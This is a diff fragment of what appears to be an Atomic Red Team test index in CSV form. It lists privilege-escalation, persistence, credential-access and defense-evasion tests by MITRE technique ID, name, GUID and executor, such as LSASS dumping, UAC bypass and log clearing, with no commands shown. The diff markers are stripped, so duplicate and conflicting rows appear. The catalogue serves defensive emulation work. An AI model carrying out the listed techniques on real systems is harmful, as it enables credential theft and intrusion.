privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
@@ -275,46 +74,164 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1137.002,Office Test,1,Office Apllication Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1505.003,Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -328,21 +245,15 @@ defense-evasion,T1070.003,Clear Command History,5,Clear Bash history (truncate),
defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Clear Command History,9,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Clear Command History,10,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.002,Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
